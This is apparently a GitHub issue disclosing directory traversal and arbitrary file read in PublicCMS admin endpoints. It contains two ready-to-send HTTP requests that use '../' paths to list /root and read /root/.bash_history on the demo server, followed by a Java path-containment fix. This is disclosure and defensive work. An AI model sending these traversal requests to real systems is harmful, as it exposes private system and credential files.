sanluan/PublicCMS

There is a "Directory Traversal" and "Arbitrary file read" vulnerability that can read system dir and file

jearyorg opened this issue · 1 comments

First, you should log in to the demo account.

Directory Traversal POC:

GET /admin/cmsWebFile/list.html?path=../../../../../root&_=1529029023591 HTTP/1.1
Host: cms.publiccms.com
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.79 Safari/537.36
Referer: http://cms.publiccms.com/admin/
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: **
Connection: close

Arbitrary file read POC:

GET /admin/cmsTemplate/content.html?path=../../../../../../../../../root/.bash_history&_=1529029023587 HTTP/1.1
Host: cms.publiccms.com
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.79 Safari/537.36
Referer: http://cms.publiccms.com/admin/
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: **
Connection: close

You can use these two PoCs to browse system directories and read any file.

4fe81a5
Thank you for finding this very serious problem
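
A containment check of the kind the two `path` parameters in this report call for, as an added example that is not part of the original issue and not the change made in the project's commit. The class name, `resolveInside` and the temporary template directory are hypothetical; the rejected inputs reuse the `path` values from the requests above.

```java
import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.InvalidPathException;
import java.nio.file.Path;

public class SafePathDemo {

    /** Resolve a user-supplied path under base; throw if the result leaves base. */
    static Path resolveInside(Path base, String userPath) throws IOException {
        Path root = base.toRealPath();            // canonical base, symlinks resolved
        Path candidate;
        try {
            // resolve() returns userPath unchanged when it is absolute, so the
            // startsWith() check below rejects absolute inputs as well.
            candidate = root.resolve(userPath).normalize();  // collapses "../"
        } catch (InvalidPathException e) {        // e.g. an embedded NUL character
            throw new SecurityException("invalid path");
        }
        // Path.startsWith compares whole name elements, so a sibling such as
        // /srv/site-old does not pass for the base /srv/site.
        if (!candidate.startsWith(root)) {
            throw new SecurityException("path escapes base directory");
        }
        // When the target exists, check again after resolving symlinks.
        if (Files.exists(candidate) && !candidate.toRealPath().startsWith(root)) {
            throw new SecurityException("symlink escapes base directory");
        }
        return candidate;
    }

    public static void main(String[] args) throws IOException {
        Path base = Files.createTempDirectory("site-templates"); // constructed sample root
        Files.createDirectories(base.resolve("include"));
        Files.write(base.resolve("include/header.html"), "<h1>ok</h1>".getBytes());
        String[] inputs = {
            "include/header.html",
            "include/../include/header.html",
            "../../../../../root",
            "../../../../../../../../../root/.bash_history",
            "/etc/hostname"
        };
        for (String in : inputs) {
            try {
                resolveInside(base, in);
                System.out.println("ALLOW " + in);
            } catch (SecurityException e) {
                System.out.println("DENY  " + in + " (" + e.getMessage() + ")");
            }
        }
    }
}
```

The check belongs in the shared code path that turns a request parameter into a file, so that directory listing and file reading cannot drift apart in what they accept.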